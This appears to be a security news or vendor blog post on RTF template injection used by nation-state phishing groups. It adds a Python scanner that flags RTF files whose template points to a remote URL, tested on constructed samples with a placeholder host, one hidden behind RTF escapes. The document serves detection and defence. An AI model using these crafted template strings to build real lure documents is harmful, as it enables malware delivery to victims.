Cybersecurity Breach 

New Technique To Power Phishing Campaigns

Cybersecurity researchers at Proofpoint say advanced persistent threat (APT) groups working on behalf of Russian, Chinese and Indian interests are using rich text format (RTF) template injections.

“The ease of weaponisation in this technique will also likely attract low-end and low-sophistication actors, expanding the presence of this technique in the wild, including crimeware actors” – DeGrippo

WHAT IS IT

The technique being used by hackers is easier to deploy and more effective because it’s harder for antivirus software to detect – and many organisations won’t block RTF files by default because they’re part of everyday business operations.

The technique is RTF template injection. By altering an RTF file’s document-formatting properties, it’s possible for attackers to weaponise an RTF file to retrieve remote content from a URL controlled by the attackers, enabling them to secretly retrieve a malware payload that gets installed on the victim’s machine.

HOW IT WORKS

When a victim opens an injected RTF file in Microsoft Word, Word follows the attacker-controlled URL to retrieve the payload while displaying the decoy document to the user.
This approach may require luring the user into clicking "Enable Editing" or "Enable Content" before the payload download begins, but with the right social engineering, especially behind a convincing lure, a victim can be tricked into allowing this to happen.

It isn’t a complex technique, but because it is simple and reliable, it has become popular with several nation-state hacking operations, which can deploy RTF attacks in place of more complex ones and still get the same results.
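As an added example (not code from the article, ZDNet or Proofpoint), the following Python scanner pulls the template destination out of an RTF file, decodes the standard RTF hex and Unicode escapes that can hide a URL, and flags destinations that are URLs or UNC paths rather than local files. The control word it looks for comes from the RTF specification; the sample files and the example.invalid host are constructed for the demonstration.

```python
import re
from typing import Optional

# RTF stores the attached template as a destination group: {\*\template <path-or-url>}.
TEMPLATE_GROUP = re.compile(r"\{\\\*\\template\s*([^}]*)\}")
HEX_ESCAPE = re.compile(r"\\'([0-9a-fA-F]{2})")        # \'xx  -> one byte
UNICODE_ESCAPE = re.compile(r"\\u(-?\d+)\s?\??")        # \uN?  -> one code point
REMOTE_SCHEME = re.compile(r"^(https?://|ftp://|\\\\)", re.IGNORECASE)


def decode_rtf_escapes(text: str) -> str:
    """Resolve the standard RTF escapes so an encoded destination is judged in
    its decoded form rather than as the raw control words on disk."""
    text = UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1)) & 0xFFFF), text)
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return text.replace("\\\\", "\\")            # \\ is an escaped backslash


def template_destination(rtf: bytes) -> Optional[str]:
    """Return the decoded template destination, or None if the file has none."""
    m = TEMPLATE_GROUP.search(rtf.decode("latin-1"))
    return decode_rtf_escapes(m.group(1)).strip() if m else None


def is_remote_template(rtf: bytes) -> bool:
    """True when the template points at a URL or UNC path instead of a local file."""
    dest = template_destination(rtf)
    return bool(dest) and REMOTE_SCHEME.match(dest) is not None


# Constructed samples, not files from any real campaign; the host is a placeholder.
SAMPLES = {
    "clean.rtf": rb"{\rtf1\ansi{\*\template C:\\Templates\\Normal.dotm}Quarterly report}",
    "plain-remote.rtf": rb"{\rtf1\ansi{\*\template http://example.invalid/t.dotm}Invoice}",
    # Same URL with "http" spelled as \uN and \'xx escapes (h=104, t=0x74, p=0x70).
    "encoded-remote.rtf": rb"{\rtf1\ansi{\*\template \u104?\'74\'74\'70://example.invalid/t.dotm}Invoice}",
}


def scan(samples: dict) -> dict:
    """Map each sample name to (destination, remote?) for triage."""
    return {name: (template_destination(b), is_remote_template(b)) for name, b in samples.items()}


if __name__ == "__main__":
    for name, (dest, remote) in scan(SAMPLES).items():
        print(f"{name:20} remote={remote!s:5} template={dest}")
```

A mail gateway or endpoint scanner can apply the same check to any attachment that starts with `{\rtf`; a remote destination in the template group is a strong signal regardless of whether the file otherwise looks benign.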

APT PROTECTION

Despite the “Advanced” designation, if APT actors are doing their job well, they will exert the least amount of resources and sophistication necessary to gain access to organisations, said Sherrod DeGrippo, vice president of threat research and detection at Proofpoint.
“This prevents actors from exposing more sophisticated tools if discovered, resulting in a greater operational disruption for threat actor groups to replace technical capabilities when discovered,” she added.
According to researchers, the earliest known instance of an APT group using RTF template injections in a campaign was in February 2021. These injections were undertaken by DoNot Team, an APT group that has been linked to Indian state interests.

FURTHER POTENTIAL RISKS

While only a handful of APT groups have attempted to deploy RTF-based attacks so far, researchers warn that the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape – and this could mean campaigns leveraging this technique are adopted by financially motivated cyber criminals.

For more information about this topic, visit the ZDNet article or go to our Proofpoint offering.
